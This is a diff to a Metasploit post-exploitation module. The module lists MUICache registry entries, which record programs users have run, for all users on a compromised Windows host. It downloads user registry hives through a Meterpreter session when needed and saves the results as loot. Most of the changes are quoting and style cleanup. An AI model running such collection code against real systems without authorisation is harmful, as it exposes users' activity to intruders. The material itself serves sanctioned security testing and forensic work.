@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Post
     username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList"
     profile_subkeys = registry_enumkeys(username_reg_path)
     if profile_subkeys.blank?
-      print_error("Unable to access ProfileList registry key. Unable to continue.")
+      print_error('Unable to access ProfileList registry key. Unable to continue.')
       return nil
     end
 
@@ -63,13 +63,13 @@ class MetasploitModule < Msf::Post
         next
       end
 
-      user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath")
+      user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", 'ProfileImagePath')
       if user_home_path.blank?
-        print_error("Unable to read ProfileImagePath from the registry. Unable to continue.")
+        print_error('Unable to read ProfileImagePath from the registry. Unable to continue.')
         return nil
       end
       full_path = user_home_path.strip
-      user_names << full_path.split("\\").last
+      user_names << full_path.split('\\').last
       user_homedir_paths << full_path
       user_sids << user_sid
     end
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Post
   # later enumerate the muicahe registry key contents.
   def enum_muicache_paths(sys_sids, mui_path)
     user_mui_paths = []
-    hive = "HKU\\"
+    hive = 'HKU\\'
 
     sys_sids.each do |sid|
       full_path = hive + sid + mui_path
@@ -108,9 +108,9 @@ class MetasploitModule < Msf::Post
         print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...")
         result = process_hive(sys_path, user, muicache, hive_file)
         unless result.nil?
-          result.each { |r|
+          result.each do |r|
             results << r unless r.nil?
-          }
+          end
         end
       else
         # If the registry_enumvals returns us content we'll know that we
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Post
         # the content collected from there.
         print_status("User #{user}: Enumerating registry...")
         subkeys.each do |key|
-          if key[0] != "@" && key != "LangID" && !key.nil?
+          if key[0] != '@' && key != 'LangID' && !key.nil?
             result = check_file_exists(key, user)
             results << result unless result.nil?
           end
@@ -136,9 +136,9 @@ class MetasploitModule < Msf::Post
   def check_file_exists(key, user)
     program_path = expand_path(key)
     if file_exist?(key)
-      return [user, program_path, "File found"]
+      return [user, program_path, 'File found']
     else
-      return [user, program_path, "File not found"]
+      return [user, program_path, 'File not found']
     end
   end
 
@@ -158,17 +158,25 @@ class MetasploitModule < Msf::Post
     end
 
     print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...")
-    local_hive_copy = Rex::Quickfile.new("jtrtmp")
+    local_hive_copy = Rex::Quickfile.new('jtrtmp')
     local_hive_copy.close
     begin
       session.fs.file.download_file(local_hive_copy.path, hive_path)
     rescue ::Rex::Post::Meterpreter::RequestError
-      print_error("Unable to download NTUSER.DAT/USRCLASS.DAT file")
-      local_hive_copy.unlink rescue nil
+      print_error('Unable to download NTUSER.DAT/USRCLASS.DAT file')
+      begin
+        local_hive_copy.unlink
+      rescue StandardError
+        nil
+      end
       return nil
     end
     results = hive_parser(local_hive_copy.path, muicache, user)
-    local_hive_copy.unlink rescue nil # Windows often complains about unlinking tempfiles
+    begin
+      local_hive_copy.unlink
+    rescue StandardError
+      nil
+    end
 
     results
   end
@@ -177,8 +185,8 @@ class MetasploitModule < Msf::Post
   # extracting the contents of the MUICache registry key.
   def hive_parser(local_hive_copy, muicache, user)
     results = []
-    print_status("Parsing registry content...")
-    err_msg = "Error parsing hive. Unable to continue."
+    print_status('Parsing registry content...')
+    err_msg = 'Error parsing hive. Unable to continue.'
     hive = Rex::Registry::Hive.new(local_hive_copy)
     if hive.nil?
       print_error(err_msg)
@@ -205,7 +213,7 @@ class MetasploitModule < Msf::Post
 
     muicache_key_values.each do |value|
       key = value.name
-      if key[0] != "@" && key != "LangID" && !key.nil?
+      if key[0] != '@' && key != 'LangID' && !key.nil?
         result = check_file_exists(key, user)
         results << result unless result.nil?
       end
@@ -221,19 +229,19 @@ class MetasploitModule < Msf::Post
   # - http://forensicartifacts.com/2010/08/registry-muicache/
   # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots
   def run
-    print_status("Starting to enumerate MUICache registry keys...")
-    sys_info = sysinfo['OS']
+    print_status('Starting to enumerate MUICache registry keys...')
+    version = get_version_info
 
-    if sys_info =~ /Windows XP/ && is_admin?
-      print_good("Remote system supported: #{sys_info}")
-      muicache = "\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache"
-      hive_file = "\\NTUSER.DAT"
-    elsif sys_info =~ /Windows 7/ && is_admin?
-      print_good("Remote system supported: #{sys_info}")
+    if version.xp_or_2003? && is_admin?
+      print_good("Remote system supported: #{version.product_name}")
+      muicache = '\\Software\\Microsoft\\Windows\\ShellNoRoam\\MUICache'
+      hive_file = '\\NTUSER.DAT'
+    elsif version.build_number >= Msf::WindowsVersion::Vista_SP0 && is_admin?
+      print_good("Remote system supported: #{version.product_name}")
       muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache"
-      hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat"
+      hive_file = '\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat'
     else
-      print_error("Unsupported OS or not enough privileges. Unable to continue.")
+      print_error('Unsupported OS or not enough privileges. Unable to continue.')
       return nil
     end
 
@@ -242,32 +250,32 @@ class MetasploitModule < Msf::Post
       'Indent' => 1,
       'Columns' =>
       [
-        "Username",
-        "File path",
-        "File status",
+        'Username',
+        'File path',
+        'File status',
       ]
     )
 
-    print_status("Phase 1: Searching user names...")
+    print_status('Phase 1: Searching user names...')
     sys_users, sys_paths, sys_sids = find_user_names
 
     if sys_users.blank?
-      print_error("Was not able to find any user accounts. Unable to continue.")
+      print_error('Was not able to find any user accounts. Unable to continue.')
       return nil
     else
-      print_good("Users found: #{sys_users.join(", ")}")
+      print_good("Users found: #{sys_users.join(', ')}")
     end
 
-    print_status("Phase 2: Searching registry hives...")
+    print_status('Phase 2: Searching registry hives...')
     muicache_reg_keys = enum_muicache_paths(sys_sids, muicache)
     results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file)
 
     results.each { |r| table << r }
 
-    print_status("Phase 3: Processing results...")
-    loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information")
+    print_status('Phase 3: Processing results...')
+    loot = store_loot('muicache_info', 'text/plain', session, table.to_s, nil, 'MUICache Information')
     print_line("\n" + table.to_s + "\n")
     print_good("Results stored as: #{loot}")
-    print_status("Execution finished.")
+    print_status('Execution finished.')
   end
 end
